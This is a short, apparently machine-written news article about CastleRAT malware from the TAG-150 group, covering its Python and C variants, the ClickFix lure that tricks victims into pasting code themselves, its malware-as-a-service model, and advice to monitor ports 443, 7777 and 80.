Ethical Hacking News
CastleRAT malware, developed in both Python and C programming languages, has been spreading through ClickFix attacks, tricking victims into installing the malware. The gang's operations as a malware-as-a-service operation make it essential for users to be vigilant and take proactive measures to protect themselves against this threat.
CastleRAT malware has advanced capabilities and stealthy nature, making it challenging to detect and track. The most recent variant of CastleRAT uses ClickFix attacks to trick users into running the malware themselves. Two other malware families - CastleBot and CastleLoader - spread through bogus GitHub repositories and ClickFix attacks. The gang operates as a malware-as-a-service operation, selling infected systems to operators. The Python variant is stealthy with zero or few antivirus detections, while the C variant has more advanced capabilities. Users are tricked into running the malware code themselves, making it challenging for security checks. Combating CastleRAT requires monitoring ports and using services like Recorded Future's, but relying on established providers alone is not enough.
CastleRAT malware has been making headlines lately, and for good reason. This sophisticated threat has been gaining attention from cybersecurity experts and researchers due to its advanced capabilities and stealthy nature. In this article, we will delve into the details of CastleRAT malware, its variants, and the tactics used by its operators.
The most recent variant of CastleRAT malware, developed in both Python and C programming languages, has been spotted spreading through ClickFix attacks. This technique uses fake login screens from popular applications and web services to trick users into running the malware themselves. The attackers instruct the operator to open the Windows Run dialog box or PowerShell terminal and cut and paste malware code into the system to "fix" the problem. According to PRODAFT's Catalyst platform, TAG-150's CastleLoader code achieved a 28.7 percent success rating in persuading victims to install the malware themselves.
The CastleRAT malware is operated by the TAG-150 criminal crew, which was first identified this spring. They have already developed two other malware families – CastleBot and CastleLoader – which spread through bogus GitHub repositories and by using ClickFix attacks that socially engineer computer users into running the malware themselves. The gang operates as a malware-as-a-service operation, according to IBM, selling its infected systems to operators running a variety of info-stealing and ransomware operations.
The Python variant of CastleRAT is far sneakier at slipping under the radar, exhibiting zero or very few antivirus detections. This is attributed to its stealthy design, making it challenging for security researchers to detect and track. On the other hand, the C variant of CastleRAT has more advanced capabilities, including harvesting keystrokes, taking screen captures, and registering persistence.
The ClickFix technique used by TAG-150's malware families has proven to be a disturbingly effective tactic in persuading victims to install the malware themselves. This is attributed to the fact that users are tricked into running the malware code themselves, making it more likely to get past security checks.
To combat this threat, Recorded Future recommends using its own services as well as monitoring ports 443 and 7777 for suspicious activity, and of course port 80. However, the researchers also caution against relying solely on established providers, as they observed the malware being hosted from a Google Cloud IP address.
In conclusion, CastleRAT malware represents a sophisticated threat to cybersecurity, with its advanced capabilities and stealthy nature making it challenging to detect and track. The use of ClickFix attacks and the gang's operations as a malware-as-a-service operation make it essential for users to be vigilant and take proactive measures to protect themselves against this threat.
Related Information:
https://www.ethicalhackingnews.com/articles/CastleRAT-Malware-A-Sophisticated-Threat-to-Cybersecurity-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2025/09/05/clickfix_castlerat_malware/
https://www.msn.com/en-us/money/other/shell-to-pay-crims-invade-your-pc-with-castlerat-malware-now-in-c-and-python/ar-AA1LYtMr
https://consumer.ftc.gov/articles/malware-how-protect-against-detect-and-remove-it
Published: Fri Sep 5 15:25:16 2025 by llama3.2 3B Q4_K_M
